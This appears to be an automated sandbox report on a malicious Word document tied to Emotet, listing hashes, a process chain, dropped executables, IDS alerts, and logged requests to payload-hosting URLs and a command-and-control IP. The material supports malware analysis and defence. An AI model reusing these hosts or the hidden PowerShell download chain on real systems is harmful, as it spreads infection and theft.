File name: | FILE_PO_01162020EX.doc |
Full analysis: | https://app.any.run/tasks/96e94eb8-591f-4887-9d4f-311a70411599 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2020, 14:50:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vitae., Author: Louise Guerin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 16 11:05:00 2020, Last Saved Time/Date: Thu Jan 16 11:05:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 27, Security: 0 |
MD5: | D4F6D2E4A0EDEF8D2F5496FA469DF407 |
SHA1: | 7E3F00D4E0A3B2A561E293116DBBD0F26112A337 |
SHA256: | D8E78E236ED8030EA028EE13A3B779CE7F998A8C15E25E6E441B01544DEC5666 |
SSDEEP: | 6144:S0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+gLlSnx/zRiN:S0E3dxtR/iU9mvUPzzi |
.doc | | | Microsoft Word document (80) |
---|---|---|---|

Title: | Vitae. |
---|---|
Subject: | - |
Author: | Louise Guerin |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:01:16 11:05:00 |
ModifyDate: | 2020:01:16 11:05:00 |
Pages: | 2 |
Words: | 4 |
Characters: | 27 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 30 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2152 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FILE_PO_01162020EX.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
3312 | Powershell -w hidden -en [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | — | wmiprvse.exe |
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3336 | "C:\Users\admin\128.exe" | C:\Users\admin\128.exe | — | Powershell.exe |
 | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1 | | | |
3096 | --cb5098b5 | C:\Users\admin\128.exe | — | 128.exe |
 | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1 | | | |
2588 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 128.exe |
 | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1 | | | |
1724 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
 | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Version: 1, 0, 0, 1 | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA708.tmp.cvr | — | — | — |
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B7FEZ0X6C2BR25BT8HO9.temp | — | — | — |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 0E05E68038AF8AA8C63394552B3C760D | 9FDE1B31C30474569716CC4D6BF521F6FB27A16EF872E781D1827550DC2A4A37 |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 57C065C449D8BDBE8737E8BAAC4E9580 | 338318F0365ED3E71A63797DE1E923710D5CA3EA4623141F225DEB0646C962DC |
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
3312 | Powershell.exe | C:\Users\admin\128.exe | executable | 1F93E345F9BD17E469CD494C519830CA | 9DAECBB136842D6AE4987BB723A4D00ECE34A3E5F81C5EAB3FF507F70EA88679 |
3096 | 128.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | D331AF0328EEB60550A0C52C7B3E7403 | 2D5C7C8DFF838BC19237E07DB7E1072F7A8D17C4E22E8CBB650F997091044A80 |
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b159.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$LE_PO_01162020EX.doc | pgc | 260C051957E423B7394FC4898AB9A05E | 9C8EAAD2658EC959C54D1C877EF9505B3B2AD60300849F3FB635D9B8D0E24F69 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3312 | Powershell.exe | GET | 200 | 31.22.4.72:80 | http://ecrib.e-lyfe.com/21rqvsb/XLkpTvt/ | GB | html | 82 b | unknown |
1724 | serialfunc.exe | POST | — | 100.6.23.40:80 | http://100.6.23.40/gKVKXByTvSPOiyZcv | US | — | — | malicious |
3312 | Powershell.exe | GET | 200 | 85.125.94.153:80 | http://www.moestlstudios.com/error/kx8/ | AT | executable | 332 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3312 | Powershell.exe | 31.22.4.72:80 | ecrib.e-lyfe.com | Wildcard UK Limited | GB | unknown |
3312 | Powershell.exe | 164.68.106.145:80 | blog.arquitetofabiopalheta.com | Cogent Communications | US | suspicious |
3312 | Powershell.exe | 85.125.94.153:80 | www.moestlstudios.com | Liberty Global Operations B.V. | AT | suspicious |
1724 | serialfunc.exe | 100.6.23.40:80 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
Domain | IP | Reputation |
---|---|---|
nfaagro.com | | suspicious |
blog.arquitetofabiopalheta.com | | unknown |
ecrib.e-lyfe.com | | unknown |
www.moestlstudios.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3312 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3312 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3312 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1724 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
1724 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
1724 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |